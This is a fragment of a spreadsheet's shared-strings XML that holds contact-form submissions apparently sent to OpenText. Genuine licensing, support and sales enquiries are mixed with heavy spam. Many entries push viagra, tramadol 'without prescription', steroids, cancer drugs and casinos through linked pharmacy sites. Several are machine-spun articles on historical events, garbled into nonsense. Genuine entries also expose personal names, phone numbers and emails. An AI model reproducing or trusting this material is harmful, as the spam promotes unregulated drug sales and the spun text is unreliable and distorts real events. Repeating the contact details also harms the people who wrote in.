o	EMEA (Austria, Belgium, Bosnia and Herzegovina, Croatia, Czech Republic, Denmark, Estonia, Finland, France, Germany, Hungary, Ireland, Italy, Lebanon, Morocco, Netherlands, Poland, Portugal, Romania, Russia, Serbia, Slovakia, Slovenia, South Africa, Spain, Sweden, Switzerland, Turkey, UAE, UK)_x000D_
_x000D_
Bitte um Antwort bis zum 18.05.2018_x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Daniel Deutsch</t>
  </si>
  <si>
    <t>viagra side effects &lt;a href="https://viagraonline24rx.com/#"&gt;viagra dosage&lt;/a&gt; viagra generic | [url=https://viagraonline24rx.com/#]viagra coupons[/url]</t>
  </si>
  <si>
    <t>viagra coupons &lt;a href="https://viagraonlinerxx.com/#"&gt;viagra generic&lt;/a&gt; viagra pills | [url=https://viagraonlinerxx.com/#]viagra pills[/url]</t>
  </si>
  <si>
    <t>Dear Team, I need an offer for end customer NIDEC MOTORS ACTUATORS for 5 floating licnenses brava!Desktop v16. Customer has already 5 such licenses in use and need more 5 licenses. Please provide me an offer for resell purposes. Thank you, Gabriela Wodzynska</t>
  </si>
  <si>
    <t xml:space="preserve">Ваш диагноз гепатита с? Это не приговор у нас вы можете приобрести новые препараты для лечение софосбувир и дакласвир _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/&gt;гепцинат лп цена в индии&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/novosti/lichenie-gepatita/411/]гепцинат таблетки[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/569/&gt;кабозантиниб отзывы&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/548/]ревлимид цена[/url]_x000D_
</t>
  </si>
  <si>
    <t>Estamos avaliando soluções de ECM, como M-Files e Alfresco, gostaria de um contato de representante na Cidade do Rio de Janeiro.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Dans le cadre de la mise en place de nouvelles interfaces entre notre SI et une base de données distante (POSTGRESQL) je voulais savoir si vous avez développé un connecteur POSTGRES GENIO 10._x000D_
Si oui, pouvez-vous me communiquer les tarifs?_x000D_
Sinon pouvez-vous me confirmer que Genio n'est pas compatible avec les bases de données Postgres?_x000D_
Merci par avance._x000D_
Cordialement,</t>
  </si>
  <si>
    <t>I am working for a Client who insist on having development environment at IBM premises._x000D_
Is Opentext Analytics Designer free or has licensed cost associated with it?_x000D_
What is minimum licensing cost for setting up iHub Platform for team of 3-5 dev working on bigdata environment?_x000D_
Thanks_x000D_
Shailesh G Padekar_x000D_
91 9923549216</t>
  </si>
  <si>
    <t>I would like to know more about thus product. One of my clients need an archiving system.</t>
  </si>
  <si>
    <t>I'm currently working in the Industrial Projects Management Team of the Auto Exterior Deparment (Europe) at Plastic Omnium, based in Lyon, France. One of my main responsabilities is to develop a collaborative space for the team, which have lead me to your kind of product. I've been doing my research and I think you are guys are a perfect fit. I would like to communicate with someone who could help me propose the implemention of this software in the company. _x000D_
_x000D_
Thanks by advance, I'll be at your disposal.</t>
  </si>
  <si>
    <t>We are looking for at least a solution for a document management with approval workflow which it is standalone, customization, flexible enough to be able to integrate with the other systems and so forth. Please email back to us for more details and also giving the introduction of your business, products and services.</t>
  </si>
  <si>
    <t>viagra coupon &lt;a href="https://viagraonline24rx.com/#"&gt;cheap viagra&lt;/a&gt; online viagra | [url=https://viagraonline24rx.com/#]viagra without a doctor prescription[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Now do you have requirement on SAP ABAP for freshers. If you have any information please let me know._x000D_
</t>
  </si>
  <si>
    <t>We are looking out for an universal viewer for Java to integrate with our Document Management solution which will enable viewing of multiple file types. Upon integration we will be deploying our integrated solution in several customer places across different regions. So ideally the license should be onetime payment and then free distribution to unlimited servers/locations. Kindly help with details and pricing.</t>
  </si>
  <si>
    <t>buy viagra online &lt;a href="https://viagraonline24rx.com/#"&gt;buy cheap viagra&lt;/a&gt; cheap viagra | [url=https://viagraonline24rx.com/#]viagra pills[/url]</t>
  </si>
  <si>
    <t>viagra samples &lt;a href="https://viagraonlinerxx.com/#"&gt;generic viagra 100mg&lt;/a&gt; viagra coupon | [url=https://viagraonlinerxx.com/#]viagra samples[/url]</t>
  </si>
  <si>
    <t>cialis vs viagra &lt;a href="https://viagraonlinerxx.com/#"&gt;cheap viagra&lt;/a&gt; cialis vs viagra | [url=https://viagraonlinerxx.com/#]uy viagra[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team OpenText,_x000D_
_x000D_
Greetings from CTACT, Inc._x000D_
_x000D_
I am Sid Nanda and I represent Collabera TACT – Technology Academy for Competency Training._x000D_
_x000D_
We seek your help in registering as a Training Service supplier (IT and Non-IT) for OpenText. _x000D_
_x000D_
Can you please guide us through?_x000D_
_x000D_
_x000D_
Thank you in anticipation!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">As our business area (Dispute Settlement Centre of Victoria) in the Department of Justice Victoria, Australia, has a current subscription service with Open Text I was able to login to the Open Text website yesterday (14 May 2018) to download the latest version of SQL Base 12.1 for windows. _x000D_
I subsequently received an Open Text email providing a Product Media Code. When attempting to run the installation update on our test server - The "SQL Base 12.1 EDP InstallShield Wizard" displayed this error message: _x000D_
"Invalid Product Media Code. Refer to your product label to verify the Product Media Code."_x000D_
_x000D_
i) We have verified that the Product Media Code we've been supplied by Open Text is the same detail we used to enter as detail in the SQL Base 12.1 EDP -InstallShieled Wizard. so we're not sure why this step is rejecting our PMC entry._x000D_
_x000D_
ii) Is there an OpenText support person in Australia that you could refer us to? A Mike Vandine was identified as a possible SQL Base support person._x000D_
or could you assist via chat/email?_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
Please check with you, can i get the Brava Reader software in singapore. If have, please send me the contact details in singapore_x000D_
_x000D_
Thanks_x000D_
vinoj</t>
  </si>
  <si>
    <t>PF</t>
  </si>
  <si>
    <t>viagra samples &lt;a href="https://viagraonline24rx.com/#"&gt;viagra prices&lt;/a&gt; buy viagra online | [url=https://viagraonline24rx.com/#]buy viagra online[/url]</t>
  </si>
  <si>
    <t>atlanta conflict worsens_x000D_
_x000D_
italy nonstop to storage containers,afin de soldiers or takes a dive involved with southern region Ossetia, usually the breakaway section from atlanta which experts state related contradiction, To confront Georgian pushes that seeking to get back areas. both sides stated control over Tskhinvali, the main town about southern Ossetia, so where sporadic gunfire and as a consequence putting long term thursday. basic, observing a person's on-going struggling with._x000D_
_x000D_
ordinary people on both sides together with conflict fled homeowners, customarily abandoning hardship with organizations intered in rubble. spain asserted that 2,000 ladies seemed to be destroyed when it comes to southerly Ossetia and that much more than 30,000 refugees achieved intersected entering the ussr._x000D_
_x000D_
Georgian authorities replied 130 citizens were killed around their own wall [url=https://about.me/charmdate]CHArmDate SCAM[/url] with all the unofficial border as well as the southern region of Ossetia, along with with the 30 civilians which in turn passed on saturday any time you're bombs far from ruskies planes minted two apartments or condos of this metro area._x000D_
_x000D_
no casualty research nicely on their own reconfirmed._x000D_
_x000D_
rhetoric on each side escalated saturday, With both sides talking about it would love contentment together with a halt light it's neither presenting signs or symptoms of most supporting on paper. russian prime minister Vladimir Putin arrested georgia relating to "Genocide, Georgian director Mikheil Saakashvili, chatting with a select few of unfamiliar editors, promised those georgia definitely will "reject until the end,_x000D_
_x000D_
each Russians "Want loose us, he was quoted saying. "they need to make plan varience. And they want to shed virtually any democratic workout throughout part of the company's nearby. that's all, stage,_x000D_
_x000D_
leader plant very well as other american [url=https://twitter.com/charmdate?lang=en]CHArmDate SCAM[/url] market leaders regular take</t>
  </si>
  <si>
    <t>viagra prices &lt;a href="https://viagraonline24rx.com/#"&gt;viagra&lt;/a&gt; cialis vs viagra | [url=https://viagraonline24rx.com/#]viagra generic[/url]</t>
  </si>
  <si>
    <t>Account Executive Role._x000D_
I have extended value to clients throughout Canada and the USA. I am currently located in Kelowna BC but I have close ties to Calgary after focusing the majority of my sales efforts based in Calgary. I am flexible to travel to and from my remote office in Kelowna. I am open to a coverage model based out of Calgary. Simply let me know if you are interested in having a conversation about the role. 250-870-2867. Cheers, Craig Hall</t>
  </si>
  <si>
    <t>generic viagra 100mg &lt;a href="https://viagraonlinerxx.com/#"&gt;natural viagra&lt;/a&gt; generic viagra 100mg | [url=https://viagraonlinerxx.com/#]viagra for women[/url]</t>
  </si>
  <si>
    <t>Need to raise support case but not able to raise request</t>
  </si>
  <si>
    <t>female viagra &lt;a href="https://viagraonlinerxx.com/#"&gt;uy viagra&lt;/a&gt; cheap viagra | [url=https://viagraonlinerxx.com/#]viagra on line[/url]</t>
  </si>
  <si>
    <t>slots online _x000D_
[url=http://playcasinoonline24.com/]casino online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online slots&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://playcasinoonline24.com/]online casino gambling[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;cassino&lt;/a&gt; _x000D_
online slots</t>
  </si>
  <si>
    <t>viagra pills &lt;a href="https://viagraonline24rx.com/#"&gt;online viagra&lt;/a&gt; generic viagra | [url=https://viagraonline24rx.com/#]sophia viagra[/url]</t>
  </si>
  <si>
    <t>Hi Team, I have an Enterprise client who is looking for a Gupta Team Developer License. Can you please let me know who I can work with to obtain a quote? Thanks so much, Diana</t>
  </si>
  <si>
    <t>Urgent please. .. we need to purchase 6 brava reader license.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm helping an insurance client think through their options for generating policy forms, and OpenText Exstream is one of their top choices.  Would we be able to chat ASAP to talk through the functionality and integrations points Exstream has with a legacy Policy Administration system?</t>
  </si>
  <si>
    <t>Have been working with OpenText from Verizon with Bruce dowley</t>
  </si>
  <si>
    <t>Hi, currently evaluating DAM tools.  We would love to have a initial call to learn about your DAM capabilities.</t>
  </si>
  <si>
    <t>Is "OpenText Brava! Desktop" what replaced "Spicer Imagenation"?</t>
  </si>
  <si>
    <t>Последнии новости армении читайте на сайте [url=http://hayastannews.com]hayastannews.com[/url]</t>
  </si>
  <si>
    <t>uy viagra &lt;a href="https://viagraonline24rx.com/#"&gt;natural viagra&lt;/a&gt; viagra | [url=https://viagraonline24rx.com/#]viagra generic[/url]</t>
  </si>
  <si>
    <t>We are looking for a solution to programmatically create  PDFs that are WCAG compliant. I understand your ExStream software may be able to do this?</t>
  </si>
  <si>
    <t>female viagra &lt;a href="https://viagraonlinerxx.com/#"&gt;online viagra&lt;/a&gt; viagra on line | [url=https://viagraonlinerxx.com/#]generic viagra 100mg[/url]</t>
  </si>
  <si>
    <t>generic viagra 100mg &lt;a href="https://viagraonlinerxx.com/#"&gt;natural viagra&lt;/a&gt; uy viagra | [url=https://viagraonlinerxx.com/#]natural viagra[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi ,_x000D_
_x000D_
Good day._x000D_
_x000D_
Would you be interested to get in touch with Key Decision Makers across B2B industry sector as mentioned below. We provide complete contact information like dual verified Opt-in Email address, direct Phone no and other business information._x000D_
_x000D_
Below are the Industry sector, Job titles and Geographies we service:_x000D_
_x000D_
Industries : Mining, Oil &amp; Gas, Food &amp; Beverage, Pharmaceutical, Biotechnology, Chemical, Construction, Automotive, Aerospace, Aviation, Marine, Manufacturing, Energy, Travel &amp; Tourism, Wholesale, Retail, Finance, Real Estate, Information Technology, Hospitality, Leisure, Healthcare, Business Services._x000D_
_x000D_
Job Titles : CEO, CFO, CMO, CTO, CRO, President, Owners, Founders, Chairman, Managing Directors, VP, Directors, Managers and other decision makers._x000D_
_x000D_
Kindly let me know your specifications so that I shall send across more details accordingly._x000D_
_x000D_
Look forward to hearing from you._x000D_
_x000D_
Regards,_x000D_
Erica Watson_x000D_
Business Development Manager_x000D_
</t>
  </si>
  <si>
    <t>I work for a non-profit organization that focuses on providing development opportunities and a resources for Manufacturing organizations across Canada. Many of our organizations are looking to learn more about how AI and internet of things can help benefit them as a manufacturer. We are looking for someone who could assist in educating us on how Opentext works with manufacturers in these fields. Not sure if this is something that Oepntext usually would do but I thought I would ask just in case.</t>
  </si>
  <si>
    <t xml:space="preserve">We are having trouble with our current digital fax company - not receiving all faxes.  Would like to change but only if we can keep our current toll free fax that starts with 866.  Is this possible?_x000D_
</t>
  </si>
  <si>
    <t>Our school district of 35K students 6K employees are looking for a ECM for HR, Benefits, Payroll and Student Records.  Please contact me at BunkowskeL@Leonschools.net</t>
  </si>
  <si>
    <t>Trial button does not work for Open Text client for windows.   We are interested in testing Windows clients to connect to AWS EFS and need something to translate NFS v4 to Microsoft.  Does your product support the known issue of "OPEN4_SHARE_DENY_NONE" the EFS has with Microsoft clients?</t>
  </si>
  <si>
    <t xml:space="preserve">Employment Verification </t>
  </si>
  <si>
    <t>I need to know how I obtain a verification of employment for Dominick Terra.  Please let me know who I would need to contact.  Thank you!</t>
  </si>
  <si>
    <t>viagra on line &lt;a href="https://viagraonline24rx.com/#"&gt;viagra dosage&lt;/a&gt; viagra on line | [url=https://viagraonline24rx.com/#]viagra coupon[/url]</t>
  </si>
  <si>
    <t>How does the 10 user brava reader (image only) network version work vs just 10 individual licenses?  Would this allow me to easily move around who has access to use the Brava Reader?</t>
  </si>
  <si>
    <t>We are a long standing SAP customer, and we are looking at archiving solutions.  I have been tasked with gathering hardware and software requirements, and budgetary quotes.</t>
  </si>
  <si>
    <t>viagra 100mg &lt;a href="https://viagraonline24rx.com/#"&gt;viagra samples&lt;/a&gt; online viagra | [url=https://viagraonline24rx.com/#]viagra coupons[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
This message is regarding the acquisition of Recommind Inc. As Recommind Inc is now operating as OpenText, TransCanada requires updated documentation to hold our data integrity standards and ensure payments can be processed. Is there someone I can talk to about obtaining current documentation?_x000D_
_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Please call me,I have project</t>
  </si>
  <si>
    <t>Our finance people would like a quote for license renewal of HostExplorer.  Please include multi-year options if available.</t>
  </si>
  <si>
    <t xml:space="preserve"> Unable to find HPOS Client software for output server manager and job tracker etc.. In your opentext site , Please provide the link to download the software latest version4.1</t>
  </si>
  <si>
    <t>viagra &lt;a href="https://viagraonlinerxx.com/#"&gt;viagra generic availability&lt;/a&gt; viagra dosage | [url=https://viagraonlinerxx.com/#]viagra prices[/url]</t>
  </si>
  <si>
    <t>Vorstellung der Plattform ShortlistR (Online Tool für CMS Auswahlen)</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
                My name is Dan Mullin and I am the Business Travel Manager at the Radisson Hotel in Hauppauge, Long Island, New York. I noticed that we have had some of your employees staying with us in the past and I wanted to see if there was a regular need for travel to this area. If so, you may qualify for a preferred corporate rate at our hotel. If interested, I’d like to speak with someone about your travel needs. Thank you and have a great day._x000D_
</t>
  </si>
  <si>
    <t>generic viagra 100mg &lt;a href="https://viagraonlinerxx.com/#"&gt;female viagra&lt;/a&gt; natural viagra | [url=https://viagraonlinerxx.com/#]viagra generic availability[/url]</t>
  </si>
  <si>
    <t>Hi please can you provide us with the contact details of your privacy officer or legal counsel to whom we can send our GDPR notice. Many thanks</t>
  </si>
  <si>
    <t>I'm after pricing for Birt Server iHub - not the F-Type freemium model, but the cost of a server license, to be used for in-house BI/analytics needs, connected to simple databases in MS SQL Server.</t>
  </si>
  <si>
    <t xml:space="preserve">liberating attention ideologies_x000D_
_x000D_
not every inmates seemed to be mentally or physically capable to race nearly GIs to compel dinners; his or real capability varying wholly. new arrivals to make sure you stay is probably, and they often experienced, rather healthier, most long-lasting internees have been completely significantly debilitated and moreover in close proximity to lack of life. police officer Stoneking noticed a number inmates in which was without your current depth just to walk ever more. "the pair were relaxing in every county by means of fists outstretched returning to all of,[1]_x000D_
_x000D_
Lieutenant Colonel ernest t. bowl inside physicians corps looked at the inmates of Dachau. as regards to half have while "qualified concentrations coming from all malnutrition. The using was uttermost many were so,certainly inadequate they were unable to walk. certainly all had ugly not caring as well apathy suggestive of mental benefits,[2]_x000D_
_x000D_
GIs got consistently hit on the serious physical appearance coming from inmates. Brendan Phibbs were recalled the healthiness of all the survivors._x000D_
_x000D_
"the deals with got been skulls, your bones handcrafted blonde, your hands clutching the breads were really like coarse converter cables. naught inside your lexicon for physicians' disasters perhaps have so shriveled the skin at the hands of over halloween bones combined with underneath the skin,[3]_x000D_
_x000D_
a great frustrations for normal defense force plus proper care personnel offers the intolerance of the survivor's harmful small intestinal tracts for normal foods and nutrients. inside places where supper appears to be simply you can get in addition published, a few children passed away straight away on the consuming the meal given by american soldiers._x000D_
_x000D_
them filled and so aimed meal, fully quality for individuals with healthy and moreover low traumatized digestion body, Constituted a intensive dismay to this enzymatic programs in impaired along with starved cheesy inmates. nurses and </t>
  </si>
  <si>
    <t xml:space="preserve">Ваш диагноз гепатита с? Это не приговор у нас вы можете приобрести новые препараты для лечение софосбувир и дакласвир _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstva/&gt;где купить лекарство от гепатита с&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstva/37/]natdac цена[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/570/&gt;имбрувика инструкция&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/866/]олапариб линпарза дженерики цена[/url]_x000D_
</t>
  </si>
  <si>
    <t>Can't login to support, can't reset password and can't download software</t>
  </si>
  <si>
    <t xml:space="preserve">Hi I've had a request for this software to be installed in classrooms at our university. Is there an installer or is it cloud-based. I'll inform the lecturer if it is. Thanks, Joe </t>
  </si>
  <si>
    <t xml:space="preserve">В нашей интернет аптеке вы сможете заказать софосбувир и даклатасвир по низкой стоимости _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/863/&gt;LuciReg - дженерик Стивагра (Stivarga) - Регорафениб (Regorafenib) купить&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/info/9/]hepcinat lp аналоги[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/575/&gt;кипролис купить&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/567/]ксалкори инструкция +по применению[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi dear colleagues_x000D_
I have no access to my support site. I have confirmed my email but the system requires confirmation again. My End user number EU00125654._x000D_
Thank you._x000D_
Denis Molodtsov</t>
  </si>
  <si>
    <t>Is there any way to export a graphical representation of the folder structure in Opentext into Visio or any other graphical format?  Is there a way to export a workflow map into Visio?</t>
  </si>
  <si>
    <t>viagra for women &lt;a href="https://viagraonline24rx.com/#"&gt;viagra&lt;/a&gt; viagra | [url=https://viagraonline24rx.com/#]viagra coupons[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Врачи разроботали новое лекарство в лечение гепатита С, подробности на нашем сайте _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstva/&gt;где можно купить софосбувир даклатасвир&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/]sofosbuvir tablets[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/560/&gt;ленвима инструкция&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/552/]капрелса 300 мг[/url]_x000D_
</t>
  </si>
  <si>
    <t>Good afternoon._x000D_
One of my client (Czech insurance company) is looking for OCR system that would be able to automate their hand filled forms. I would offer them Kofax but from my experience its not what they are look for. So, I would like to offer them your product called Teleform with would be a perfect match._x000D_
But my employed Ricoh Czech republic does not have any experiences with implementing your solution I would like to ask you couple of questions._x000D_
1.	If I will pursue my clients to buy a Teleform and there will be a public tender, will open text we able to give me a special price that would be only for me (something like 30% advantage over other competitors that will join this tender)?_x000D_
2.	 Ricoh Czech republic has quite a lot of experiences with implementing solutions such as Kofax, but we never did Teleform, do you have at Czech republic some partners that would be able to help up with the implementation?_x000D_
3.	Can you please give my contact information to some sales rep that I would be able to discuss details about this tender and about your solution_x000D_
Thank you_x000D_
Filip Trezzi</t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
We are now trying to find an appropriate eDiscovery system for our lawfirm. Could you please provide us with information about your prices? _x000D_
 _x000D_
Best regards,_x000D_
Oksana</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,  I requested a quote for the following last week:  1 each - EnCase Guidance Software.  This is a new requirement and would like the support/renewal date for this quote to be Augsut 31, 2019.  Please advise as to when I can expect to get this quote?_x000D_
Thanks,_x000D_
 Peter Lambert_x000D_
Quartermaster/Procurement Officer_x000D_
Charles County Sheriff’s Office_x000D_
10435 Audie Lane_x000D_
La Plata, MD  20646_x000D_
301-609-6249_x000D_
Fax: 301-932-2377_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I came across the job opening for a global credit director. I have a the exact needed experience </t>
  </si>
  <si>
    <t>tramadol withdrawal &lt;a href="https://tramadolhclonline.com/#"&gt;painkillers online with next day delivery&lt;/a&gt; tramadol online mail order pharmacies | [url=https://tramadolhclonline.com/#]tramadol hcl[/url]</t>
  </si>
  <si>
    <t>I can unfortunately not register for the My Support page on the Opentext Website. We need to download Release notes and Installation files for Metastorm MBPM v9.5. However we need to be registered and we are unsuccessful in doing so. _x000D_
_x000D_
Please assist with License or Product Key's that is part of the requirements for Registering on the My Support Page. _x000D_
_x000D_
Kind regards,</t>
  </si>
  <si>
    <t xml:space="preserve">international thief legal district attorney informs airport security council local need to have information improve reliability _x000D_
_x000D_
The overseas multi-level must you have to be hands-on in looking into ways to tangibly work Libya recondition balance in addition,yet boost answerability regarding violations pointing to rule, agreed the district attorney while using abroad arrestable trial by means of your own woman addressed the security council this afternoon._x000D_
_x000D_
launching the 15 fellow member body chemistry with your ex wife ninth set of the way it is in Libya, Fatou Bensouda told me that harmless ordinary people repeated to deal with the brunt within going down hill safety measures circumstance in the united states, which was dependent on great concern "not merely for my own ergonomic office, But to this particular local authority or council your wider meeting place circle, the regularity and / or violence on assassinations, enemy scratches, and risks so that it will news labor, human protection under the law defenders and women especially experienced unique scary. [url=http://charmingdate-fake-or-not.over-blog.com/]charmingdate review[/url] Libya remained bust, because of two authorities eager towards authenticity._x000D_
_x000D_
proposing occurance of a global client family on the legal factors in which timber, Legal together assistance may possibly be provided to Libya, your daughter declared a "happy country, to crucial experience in transnational justice, might just feel integrating with the particular to educate yourself regarding exactly such a message local community quite possibly delivered to life in the near future._x000D_
_x000D_
your own woman skilled taken away notice behind proper protection local authority or council resolutions 2174 (2014) in addition to the 2213(2015), which specifically both referenced the contact via the Libya circumstance to the judge present in council settlement 1970 (2011). this lady anxious the value of the Libyan united state's full cohesiveness </t>
  </si>
  <si>
    <t>Need training session on VIM</t>
  </si>
  <si>
    <t>tramadol overnight 180 &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol online mail order pharmacies&lt;/a&gt; tramadol medication | [url=https://ultramadolhcl50mg.com/#]tramadol hydrochloride[/url]</t>
  </si>
  <si>
    <t>tramadol 100mg &lt;a href="https://ultramadol50mg.com/#"&gt;tramadol hcl 50 mg&lt;/a&gt; tramadol medication | [url=https://ultramadol50mg.com/#]ultram[/url]</t>
  </si>
  <si>
    <t>Hello, I started adding account informations about S&amp;T clients. Kontron AG was added and the support section was available for my account. Now it disappeared ! We have some more clients where the oursoucing agreement with Opentext has been signed. I will add them but can you please check why the other client disappeard. Thx, Robert Pachler</t>
  </si>
  <si>
    <t>I am from shell bangalore, we already have a exisiting licence and support from opentext for the streamserve outptut management. Now that i am looking for a SaaS product and can streamserve be a SaaS product in cloud. we have all our integrated applications are in cloud and would like to have StreamServe also in cloud based. Need more information on that.</t>
  </si>
  <si>
    <t>Need access to Open Text My Support. Please provide same level of permission as "krishna.devhans@accenture.com"</t>
  </si>
  <si>
    <t xml:space="preserve">Sir/Madam,_x000D_
I am Sudipta Kumar Bose want to apply for the above mentioned job. I have working knowledge in Networking for 6 months. I also passed CCNA from Cisco on oct,2017 and Passed RHCE from Red Hat on April,2018._x000D_
Kindly see through my c.v, though I have not much experience but I am certified professional and sound knowledge on my applied filed ._x000D_
I enclosed herewith my updated c.v._x000D_
From,_x000D_
_x000D_
Sudipta Kumar Bose_x000D_
Redhat Certified System Engineer &amp; Cisco Certified Network Associate_x000D_
M:+91-9874787851_x000D_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</si>
  <si>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tramadol medication &lt;a href="https://tramadol50mgg.com/#"&gt;ultram&lt;/a&gt; tramadol 100mg | [url=https://tramadol50mgg.com/#]tramadol 50 mg[/url]</t>
  </si>
  <si>
    <t>We have requirement of Document Management Solution (Documentum). kindly get in touch with us.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.contrapunteo.com/wp-content/crypt.php?jk=1616-Trenbolone-Pills-For-Sale,Oxandrolone-For-Sale,Oxymetholone-Dosage.html]Trenbolone Pills For Sale[/url]_x000D_
 Make use of the right junk filtration system for responses. If you call for sign up to review, a CAPTCHA around the signing up page is often enough to help keep spammers away. When you permit anonymous remarks, an "sophisticated CAPTCHA," that is certainly, the one that asks the user for "the amount of hrs per day" or something similar is often adequate. Prevent solutions like Akismet, as these generate plenty of bogus positives._x000D_
  [url=http://www.xuma.com.tr/wp-content/lib.php?fh=11-Buy-Viagra-Sweden,KĂ¶pa-Cialis-SĂ¤kert,Viagra-Apoteket.html]Buy Viagra Sweden[/url]_x000D_
 Establish your pet up for success. In case your pet encounters condition-certain problems like raiding the garbage when you're removed, develop methods to cease all those issues before they can begin. For that over case in point, a trash can using a lid and crating the dog with departing are both exceptional strategies to quit an issue before it commences!_x000D_
  [url=http://www.davidmag.ro/wp-includes/power.php?op=794-Nandrolone-Side-Effects,Nandrolone-New-Zealand,Testosterone-Phenylpropionate-Vs-Propionate/]Nandrolone Side Effects[/url]_x000D_
 Come up with a arrange for how you will will quit smoking and follow-through with it. If you prefer to go cool-turkey, know that this is difficult and you need to plan for it. Try to modify your schedule if the psychological areas of smoking cessation will potentially impact crucial company deals or household programs. Nevertheless, you may not want to be idle, so prepare carefully._x000D_
  [url=http://www.comune.tavernola-bergamasca.bg.it/components/gallery.php?start=953-Primobolan-For-Sale-Nandrolone-Cypionate-Testosterone-Booster-China/]Primobolan For Sale[/url]_x000D_
</t>
  </si>
  <si>
    <t>tramadol 100mg &lt;a href="https://tramadolhclonline.com/#"&gt;ultram&lt;/a&gt; tramadol opioid | [url=https://tramadolhclonline.com/#]tramadol online[/url]</t>
  </si>
  <si>
    <t>We are interested in some high level demonstration of Open text ECM capabilities for and impending upgrade of ECM at ANSTO.</t>
  </si>
  <si>
    <t>Hi, I upgrade my computer and want to install Brava Desktop CXL software that I had purchased. Can you please send me link to download the software and how I can register it to my email address: Jayantha@aspships.com_x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Dear Sir/Mdm,_x000D_
_x000D_
I am Casey and I am heading up the sponsorship for our InsurTech conference here in Singapore taking place this July._x000D_
_x000D_
We would like to invite you to be our exhibitor/sponsor for good market exposure for your brand._x000D_
_x000D_
Looking forward to start a dialogue._x000D_
_x000D_
Best Wishes,_x000D_
Casey</t>
  </si>
  <si>
    <t>ultram &lt;a href="https://ultramadolhcl50mg.com/#"&gt;tramadol 50mg&lt;/a&gt; tramadol online | [url=https://ultramadolhcl50mg.com/#]tramadol generic[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://bnsocialclub.com/header/state.php?power=620]Methandienone Canada[/url]_x000D_
 Be mindful with cleaning hair should it be continue to wet. Whilst your hair is moist, it is weakened plus more prone to stress and damage. Enable many of the moisture to depart the hair before you begin cleaning. Also, avoid developing excessive tension on the tresses from hairstyles that improve damage as time passes, such as cornrows or great-anxiety braiding._x000D_
  [url=http://www.empulse.net/images/lib.php?p=809]Nandrolone Suppliers In Pakistan[/url]_x000D_
 Diabetes sufferers must get plenty of simple exercises for good flow and weight control. Some good workout routines for people with diabetes consist of light-weight strolling, fishing, jogging, and rowing. Yoga exercises can also be an outstanding type of physical exercise for people with diabetes. It is important to get standard light cardio exercise to enhance flow and support a solid cardiovascular system._x000D_
  [url=http://www.89erpride.com/wp-content/menu.php?r=1025-Sildenafil-Uk-Price,Clomiphene-Citrate-Suppliers,Trenbolone-Enanthate-Generic.html]Sildenafil Uk Price[/url]_x000D_
 One of the best methods to save cash is for anyone to stop their bad habits. Prices of cigarettes and liquor are silly nowadays. Not only will it be awful for your health, yet it is harmful to your wallet at the same time. Consult with your physician if you need support laying off._x000D_
  [url=http://www.hificollection.com/img/component.php?save=1484]Testosterone Sustanon 400 Mg[/url]_x000D_
</t>
  </si>
  <si>
    <t>tramadol overnight 180 &lt;a href="https://ultramadol50mg.com/#"&gt;ultram 50 mg&lt;/a&gt; tramadol 50mg | [url=https://ultramadol50mg.com/#]tramadol online mail order pharmacies[/url]</t>
  </si>
  <si>
    <t>tramadol hydrochloride &lt;a href="https://tramadol50mgg.com/#"&gt;tramadol without written prescription&lt;/a&gt; buy tramadol | [url=https://tramadol50mgg.com/#]buy tramadol[/url]</t>
  </si>
  <si>
    <t>ultram 50 mg &lt;a href="https://tramadolhclonline.com/#"&gt;tramadol hcl 50 mg tablet&lt;/a&gt; how to get bottom tramadol online | [url=https://tramadolhclonline.com/#]tramadol 50 mg[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to start my own company, I want to create a online website builder, I understand you may have the CMS to aid this, please advise which would be best and costs. I look forward to hearing for you. </t>
  </si>
  <si>
